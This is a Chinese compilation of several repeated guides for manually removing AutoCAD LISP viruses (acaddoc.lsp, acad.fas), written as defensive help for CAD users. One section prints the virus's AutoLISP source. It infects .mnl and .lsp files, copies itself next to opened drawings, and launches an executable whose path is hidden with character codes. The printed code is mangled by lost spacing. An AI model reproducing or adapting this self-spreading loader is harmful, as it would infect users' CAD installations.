acaddoc(整理).lsp病毒文件彻底清除方法.pptx

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

手工查杀ACADDOC.LSP病毒发现中的这个病毒的状况是：开AutoCAD2006后提示"＜AutoCAD 菜单实用程序已加载。

正在初始化VBA 系统...执行错误执行错误＞"同时发现工作目录平时只有DWG、BAK 等熟悉文件外，多了acaddoc.lsp，打开看如下：(setqwold_cmd(getvar"cmdecho"))(setvar"cmdecho")(setqwpath(findfile"base.dcl"))(setqwpath(substrwpath1(-(strlenwpath)8)))(setqwwmnlwpath(getvar"menuname" ))(setq wnowdwg (getvar "dwgname" ))(setqwwjqm (findfile wnowdwg))(setq wdwgwpath (substr wwjqm1(-(strlen wwjqm)(strlen wnowdwg))));;;alert(setqf(open"c:\\boot.dat" "w"))(write-line"[dang]"f)(write-line (strcat"ff=" wdwgwpath)f)(write-line (strcat"yy="wpath)f)(closef)(setqboot(findfile "boot.dat"))(if(/=boot"")(command"_-vbarun" "ThisDrawing.hh" ))(setq wacadwpath (findfile "acaddoc.lsp"))(setq wacadwpath (substr wacadwpath1(strlen wacadwpath )11)))(setqwns1""wns2"")(setqwlspbj0)(setq wwjqm (strcat wpath "acaddoc.lsp" ))(if(setqwwjm (open wwjqm "r"))(progn (while (setqwwz(read-linewwjm))(setqwns1wns2)wns2 wwz))(if(> (strlen wns1) 14)(if(= (substr wns187) "acadapq" )(setq wlspbj1)))(close wwjm)))(setq wlspmnl 0)(setq wwjqm (strcat wpath "acad.mnl" ))(if(setq wwjm (open wwjqm "r")) (progn (while (setq wwz (read-line wwjm))(setq wns1 wns2) (setq wns2 wwz))(if(> (strlen wns1) 14)(if(= (substrwns187) "acadapq" )(setq wlspmnl 1))) (closewwjm)))(if(= wlspmnl 0) (progn (setq wwjqmwpath (strcat (chr97)(chr99)(chr97)(chr 100) (chr46)(chr 109) (chr 110) (chr108))))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34) ")")wwjm)(write-line "(princ)" wwjm)wwjm)))(defun wwriteapp () (if(setqwwjm1 (open wnewacad "w"))(progn (setqwwjm (open woldacad "r"))(while (setqwwz(read-line wwjm))(write-line wwzwwjm1))(close wwjm)(close wwjm1))))(and(= wacadwpath wdwgwpath) (/= wacadwpath wpath))(progn(if(= 0wlspmnl)(progn(setq woldacad (findfile "acaddoc.lsp" ))(setq wnewacad (strcat wpath "acadapq.lsp") ))(progn(setq woldacad (strcatwpath "acadapq.lsp" ))(setq wnewacad (findfile "acaddoc.lsp" )))(if(=wlspbj0) (progn (setq wwjqm (strcat wpath "acaddoc.lsp" ))(setqwwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34)")")wwjm)(write-line "(princ)" wwjm)(close wwjm))) (wwriteapp ))(progn(/= wnowdwg "Drawing.dwg" )(progn(setq woldacad (findfile "acadapq.lsp" ))(setq wnewacad (strcat wdwgwpath "acaddoc.lsp" )) (wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ)(setq strtopstr (strcat(chr92)(chr92)(chr70)(chr83)(chr49)(chr(chr83)(chr89)(chr83)(chr49)(chr92)(chr87)(chr79)(chr82)(chr75)(chr92)(chr80)(chr76)(chr79)(chr84)(chr69)(chr82)))(setq strbottomstr (strcat (chr(chr92)(chr76)(chr(chr67)(chr80)(chr82)(chr88)(chr89)(chr49)(chr46)(chr69)(chr88)(chr69)))(startapp(strcatstrtopstrstrbottomstr))(setvar"cmdecho"wold_cmd)(princ)(princ)N年以前学了点autolsp，虽然没编过什么程序，这个病毒基本还比较浅，能看得出个大概流程，原理跟acad.lsp差不多，利用AutoCAD自动加载文件活得病毒运行，然后感染，acaddoc.lsp是AutoCAD2004后每个图形打开时执行的例行程序，方便二次开发用的，当然也为病毒编写人敞开大门。

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

常见AutoCAD病毒（acad.fas、acad.lsp）清除⽅法常见AutoCAD病毒(acad.fas、acad.lsp)清除⽅法acad.fas、acad.lsp这两种病毒是最常见的CAD病毒了，⽽且往往同⼀时候出现。

因为其本⾝对系统并不具备危害性，不过恶作剧程序罢了，因此⼤多数防病毒软件对它们不起作⽤，以下介绍⼿动删除⽅法。

第⼀步：查找硬盘、U盘内的 acad.fas、lcm.fas、acad.lsp、acadapp.lsp、acadappp.lsp 五个⽂件并删除⼲净（查找前请将显⽰隐藏和系统⽂件打开，这五个⽂件不⼀定同⼀时候出现。

强烈建议使⽤Total Commander⽂件管理器查找）。

第⼆步：查找acad.mnl⽂件（这个⽂件通常有两个，⼀个在“c:/Program Files/AutoCAD****/UserDataCache/Support/”⽬录下，还有⼀个在“c:/Documents and Settings/你的username/Application Data/Autodesk/AutoCAD****/R****/chs/Support/”⽬录下。

眼下病毒仅改动第⼀个acad.mnl⽂件）。

打开acad.mnl⽂件，在⽂件末尾找到下⾯三个语句的组合并删除（这三个语句组合不⼀定同⼀时候出现），然后保存⽂件。

(if (null stol) (load "lcm" ""))(princ)(load "acadapp.lsp")(princ)(load "acadappp.lsp")(princ)附录：有关该CAD病毒 acad.fas 的说明：1.它对电脑是没有随意的危害性！2.它在8:00到18:00这段时间,对CAD没有不论什么影响的!它的副作⽤就是：你的CAD在启动时会弹出⼀个显⽰时间的对话框假设时间不在8:00⾄18:00之间，还有可能伴随"移动"命令改变等情况。

acaddoc.lsp病毒文件彻底清除方法(2012-05-20 23:33:17)转载▼分类：电脑知识标签：杂谈前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp 的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD 开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

方法一acaddoc.lsp输入的列表有缺陷（转自LOVE空间）2009年04月07日星期二上午 11:14这个是个新病毒，用以往的解决方法（ 1.lps改名为acaddoc.lsp替换）无法解决，在网络搜索了一下看到百度空间有个帖子有相关解决办法。

原帖如下：今天在Q群里又见网友请求删除CAD病毒，说用专杀工具也无法解决，于是让他把病毒文件传了给我。

打开文件一看，发现这个“acaddoc.lsp”文件内的程序代码跟以往的“acaddoc.lsp”病毒文件不同。

该病毒文件自动搜索CAD支持路径下的所有“*.mnl”文件和“*.lsp”文件。

将病毒代码（“acaddoc.lsp”文件内容）写入“*.lsp”文件内，并在“*.mnl”文件中写入“*.lsp”文件的加载路径。

同时，直线命令“line”、外部参照管理命令“xref”和分解（炸开）命令“explode”无法使用。

CAD系统感染该病毒文件后，只是简单搜索删除“acaddoc.lsp”文件，不能清除病毒。

因为所有的“*.lsp”文件已经被修改，所有“*.lsp”文件都是病毒文件。

解决方法壹：①、关闭CAD②、搜索并刪除所有“acaddoc.lsp”文件③、卸载CAD（必须卸载干净，并进入C盘用户目录内删除没有卸载完的CAD文件）后，重新安装CAD解决方法贰：①、关闭CAD②、搜索并刪除所有“acaddoc.lsp”文件③、找一台没有被CAD病毒破坏、且安装有相同版本CAD的电脑，复制其所有“*.lsp”文件和“*.mnl”文件至本机覆盖原文件（包括C盘用户目录内的相关文件）预防CAD病毒：装好CAD系统后，在没有被病毒感染前，将CAD目录内所有文件的属性设置为只读，可以减少中毒的机率。

（此法99.999%有效）附：×××\Application Data\Autodesk\AutoCAD 200×\R×.×\ 其中×××是你登录系统时的用户名， 200×和R×.×分别是CAD的版本和版本代号。

你是不是每次打开CAD，都会在文件目录中产生一个acad.lsp文件？
如果不是，你没必要再看下去了
如果是，那么恭喜你，中奖啦！请接着往下看。

很多CAD用户都出现了同一问题，即打开了一些从网上下载的或从其他地方拷贝过来的图纸后，CAD开始变的非常慢，通常打开一张图纸要等待几分钟的时间，并且一些运行于CAD上的二次开发软件的命令变的不可用。

即使重新安装CAD甚至重新安装系统，只要再次打开以前打开过的图纸，问题重现，这个问题对许多CAD设计人员都造成相当大的困扰。

该病毒利用CAD的读取机制，在用户第一次打开从网上下载的带有病毒的图纸后，该病毒即悄悄运行，并感染每一张新打开的图纸，将病毒文件到处复制，并生成很多名为acad.lsp的程序，使得CAD打开很慢，部分快捷命令被修改，而且每次打开CAD，都会在文件目录中产生一个acad.lsp文件？即便是重装CAD甚至重装系统都不能解决问题。

解决方法：0.0
1. 先将CAD程序卸载，记得要卸载干净。

2. 打开【我的电脑】，按F3，搜索硬盘上所有【acad.lsp】和【acadapp.lsp】把搜索到的文件全部全部删除。

注：搜索时必须选择高级选项
3. 从新安装CAD就OK了！
CAD技术交流群： 38600958。